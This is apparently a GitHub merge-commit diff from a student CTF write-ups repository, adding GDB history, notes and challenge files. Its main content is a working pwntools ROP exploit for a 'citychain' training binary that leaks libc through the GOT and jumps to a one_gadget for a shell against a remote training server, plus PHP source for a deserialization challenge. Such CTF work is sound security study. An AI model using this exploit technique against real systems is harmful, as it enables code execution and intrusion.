Merge branch 'main' of https://github.com/gio-del/ODC-Challenges-CTF

gio-del · Jan 6, 2024 · d315a75 · d315a75
2 parents 7bf0bd3 + 98b556d
commit d315a75
Show file tree

Hide file tree

Showing 25 changed files with 851 additions and 73 deletions.
diff --git a/writeups/packing/packing_bizarre_adventure/.gdb_history b/writeups/packing/packing_bizarre_adventure/.gdb_history
@@ -1,75 +1,3 @@
-c
-c
-c
-c
-c
-exit
-start
-ni
-ni
-si
-disass decode
-b *0x00005555555552db
-c
-ni
-disass decode
-b *0x000055555555536f
-c
-disass decode
-ni
-disass decode
-b *0x000055555555536f
-c
-ni
-c
-c
-c
-c
-ni
-exit
-start
-disass decode
-b *0x0000555555555461
-c
-ni
-exit
-start
-ni
-ni
-si
-disass decode
-ni
-disass decode
-disass 0x0000555555555486,+10
-disass 0x0000555555555486,+30
-b *0x00005555555552db
-c
-disass decode
-b *0x000055555555536f
-c
-ni
-disass decode
-exit
-start
-r
-exit
-start
-disass decode
-b *0x0000555555555486
-r
-disass decode
-exit
-r
-disass decode
-exit
-start
-disass main
-b *0x0000555555555562
-c
-disass decode
-exit
-start
-disass decode
 ni
 ni
 si
@@ -254,3 +182,75 @@ c
 ni
 disass decode
 exit
+start
+b decode
+c
+disass decode
+b *0x000055555555537c
+c
+disass decode
+start
+c
+disass decode
+b *0x0000555555555369
+c
+ni
+info b
+info break
+del 2
+info break
+del 3
+del 5
+b *0x55555555536f
+c
+ni
+start
+c
+start
+info break
+del 6
+b decode
+c
+disass decode
+hb *0x000055555555537f
+c
+start
+info break
+del 10
+c
+disass decode
+b *0x0000555555555369
+c
+start
+c
+c
+ni
+info decode
+disass decode
+vmmap
+dump binary memory
+dump binary memory dump_step1 0x555555554000 0x555555559000
+start
+c
+c
+ni
+disass decode
+b *0x0000555555555464
+c
+ni
+b *0x5555555552d5
+c
+disass decode
+ni
+info break
+del 9
+del 12
+del 15
+del 16
+info break
+b *0x555555555369
+c
+disass decode
+vmmap
+dump binary memory dump_step2 0x555555554000 0x555555559000
+exit
diff --git a/writeups/packing/packing_bizarre_adventure/dump_step1 b/writeups/packing/packing_bizarre_adventure/dump_step1
diff --git a/writeups/packing/packing_bizarre_adventure/dump_step2 b/writeups/packing/packing_bizarre_adventure/dump_step2
diff --git a/writeups/packing/packing_bizarre_adventure/writeup_sketch b/writeups/packing/packing_bizarre_adventure/writeup_sketch
@@ -61,4 +61,13 @@ If these bytes match the program returns to the decryption part for a second ste
 After the decryption routine, the last 16 bytes are basically found in the same way of the previous step
 
 
-FATTO ANCHE CON BRUTEFORCE DA GDB
+FATTO ANCHE CON BRUTEFORCE DA GDB
+## Alternative Solution
+
+Dump the two steps and statically analyze them
+
+
+FATTO ANCHE CON BRUTEFORCE DA GDB
+## Alternative Solution
+
+Dump the two steps and statically analyze them
diff --git a/writeups/rop/citychain/citychain b/writeups/rop/citychain/citychain
diff --git a/writeups/rop/citychain/citychain.bak b/writeups/rop/citychain/citychain.bak
diff --git a/writeups/rop/citychain/flag b/writeups/rop/citychain/flag
@@ -0,0 +1 @@
+flag{FAKE_FLAG}
diff --git a/writeups/rop/citychain/ld-2.31.so b/writeups/rop/citychain/ld-2.31.so
diff --git a/writeups/rop/citychain/libc-2.31.so b/writeups/rop/citychain/libc-2.31.so
diff --git a/writeups/rop/citychain/script.py b/writeups/rop/citychain/script.py
@@ -0,0 +1,81 @@
+from pwn import *
+
+if(len(sys.argv) > 1):
+    if(sys.argv[1] == '--debug'):
+        p = process("./citychain")
+        gdb.attach(p, """
+            b *0x00401568
+        """ )
+        input("wait...")
+    elif(sys.argv[1] == '--strace'):
+        p = process(["strace", "./citychain"])
+    elif(sys.argv[1] == '--remote'):
+        p = remote("bin.training.offdef.it", 5003)
+else:
+    p = process("./citychain")
+
+def add_city(name, lat, long, pop, area, elevation):
+    p.recvuntil(b'> ')
+    p.sendline(b'1')
+    p.recvuntil(b': ')
+    p.sendline(name)
+    p.recvuntil(b': ')
+    p.sendline(b"%f" % lat)
+    p.recvuntil(b': ')
+    p.sendline(b"%f" % long)
+    p.recvuntil(b': ')
+    p.sendline(b"%d" % pop)
+    p.recvuntil(b': ')
+    p.sendline(b"%d" % area)
+    p.recvuntil(b': ')
+    p.sendline(b"%d" % elevation)
+    p.recvuntil(b'2) Quit\n')
+
+def chain(name, a, b, c, d, e):
+    add_city(name, d, e, c, a, b)
+
+libc = ELF("./libc-2.31.so")
+binary = ELF("./citychain")
+
+# Leak LIBC (print a got address, need: POP RDI -> 1, POP RSI -> got address, RDX ok, RAX -> 1, syscall)
+
+start = 0x00401130
+pop_rdi = 0x00000000004015d3
+read_got = binary.symbols.got.puts
+puts = binary.symbols.plt.puts
+
+add_city(b'First', 10, 10, 10, 10, 10) # Overflow
+
+#add_city('Second', 10.5, 10.5, 0xdddddddddddddddd, 0xeeeeeeeeeeeeeeee, 0xffffffffffffffff)
+chain(b'Second', pop_rdi, read_got, puts, 0x11, 0x10)
+chain(b'Third', pop_rdi, read_got, puts, 0.4198704, 0) # 0.4198704 to restart  ## hex(int(0.4198704 * 10000000.0)) = start
+
+p.recvuntil(b'> ')
+p.sendline(b'2')
+
+leak = u64(p.recvuntil(b'\n')[:-1] + b'\x00\x00')
+print("[!] leak libc (puts): %#x" % leak)
+
+libc.address = leak - libc.symbols.puts
+
+print("[!] libc: %#x" % libc.address)
+
+# Second Step (try to use a one_gadget)
+pop_r12 = 0x0000000000401498
+one_gadget = 0xe3afe # 0xe3afe 0xe3b01 0xe3b04
+#one_gadget = 0x693cd # 0x3f303 0x693c3 0x693c9 0x693cd
+system = libc.symbols["system"]
+binsh = next(libc.search(b"/bin/sh\x00"))
+
+add_city(b'First', 10, 10, 10, 10, 10) # Overflow
+#chain(b'Second', libc.address+one_gadget, 0, 0, 0, 0)
+chain(b'Second', pop_r12, 0, libc.address+one_gadget, 0, 0)
+#chain(b'Second', p64(system), p64(binsh), 0, 0, 0)
+
+
+p.recvuntil(b'> ')
+p.sendline(b'2')
+
+p.sendline(b'cat flag')
+
+p.interactive()
diff --git a/writeups/rop/citychain/writeups b/writeups/rop/citychain/writeups
@@ -0,0 +1,17 @@
+    Arch:     amd64-64-little
+    RELRO:    Partial RELRO
+    Stack:    No canary found
+    NX:       NX enabled
+    PIE:      No PIE (0x3ff000)
+    FORTIFY:  Enabled
+
+
+We need a libc leak, then maybe a onegadget it's good enough
+
+
+To leak libc it's sufficient to write out an address from the got (easy since the binary it's not PIE)
+
+- Latitude must be <= 90
+- Longitude must be <= 180
+
+No checks on negative values
diff --git a/writeups/serialization/vpn/backup.php b/writeups/serialization/vpn/backup.php
@@ -0,0 +1,20 @@
+<?php
+    include 'db.php';
+    include 'data.php';
+
+    session_start();
+
+    $db = new DB();
+    $file = "cert.bak";
+    $userid = $_SESSION["user"]->id;
+    $data = $db->get_certificates($userid);
+    // echo $data;
+    $sData = serialize($data);
+    header('Content-Description: File Transfer');
+    header('Content-Type: application/octet-stream');
+    header('Content-Disposition: attachment; filename="backup_certificates"');
+    header('Cache-Control: must-revalidate');
+    header('Pragma: public');
+    // header('Content-Length: ' . sizeof($sData));
+    echo $sData;
+?>
diff --git a/writeups/serialization/vpn/base.php b/writeups/serialization/vpn/base.php
@@ -0,0 +1,74 @@
+<?php
+include "db.php";
+include "data.php";
+// Start the session
+session_start();
+?>
+<!DOCTYPE html>
+<html lang="en">
+
+<head>
+  <title>VPN Manager</title>
+  <meta name="description" content="VPN Manager">
+  <link rel="icon" href="./icons/ico.png" type="image/x-icon">
+  <meta charset="utf-8">
+  <meta http-equiv="X-UA-Compatible" content="IE=edge">
+  <meta name="viewport" content="width=device-width, initial-scale=1">
+
+  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
+
+
+  <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
+  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
+  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
+  <!-- <link href="https://raw.githubusercontent.com/nuriakman/PHP-Egitimi/master/bootstrap.ornekleri/bootstrap/css/bootstrap.min.css">
+
+  <script src="https://raw.githubusercontent.com/nuriakman/PHP-Egitimi/master/bootstrap.ornekleri/bootstrap/js/jquery-3.5.1.min.js"></script>
+  <script src="https://raw.githubusercontent.com/nuriakman/PHP-Egitimi/master/bootstrap.ornekleri/bootstrap/js/popper.min.js"></script>
+  <script src="https://raw.githubusercontent.com/nuriakman/PHP-Egitimi/master/bootstrap.ornekleri/bootstrap/js/bootstrap.min.js"></script> -->
+
+</head>
+
+<body>
+<nav class="navbar navbar-expand-lg navbar-light bg-light">
+  <a class="navbar-brand" href="#">Navbar</a>
+  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
+    <span class="navbar-toggler-icon"></span>
+  </button>
+  <div class="collapse navbar-collapse" id="navbarNav">
+    <ul class="navbar-nav">
+      <li class="nav-item active">
+        <a class="nav-link" href="index.php">Home <span class="sr-only">(current)</span></a>
+      </li>
+      <?php
+        if(isset($_SESSION["user"])){
+        ?>
+
+      <li class="nav-item">
+       <a class="nav-link" href="backup.php"> Backup </a>
+      </li>
+      <li class="nav-item">
+       <a class="nav-link" href="restore.php"> Restore </a>
+      </li>
+
+      <li class="nav-item">
+       <a class="nav-link" href="logout.php">Logout</a>
+      </li>
+
+        <?php
+        }
+        else {
+        ?>
+      <li class="nav-item">
+        <a class="nav-link" href="login.php">Login</a>
+      </li>
+      <li class="nav-item">
+        <a class="nav-link" href="register.php">Register</a>
+      </li>
+        <?php
+        }
+        ?>
+
+    </ul>
+  </div>
+</nav>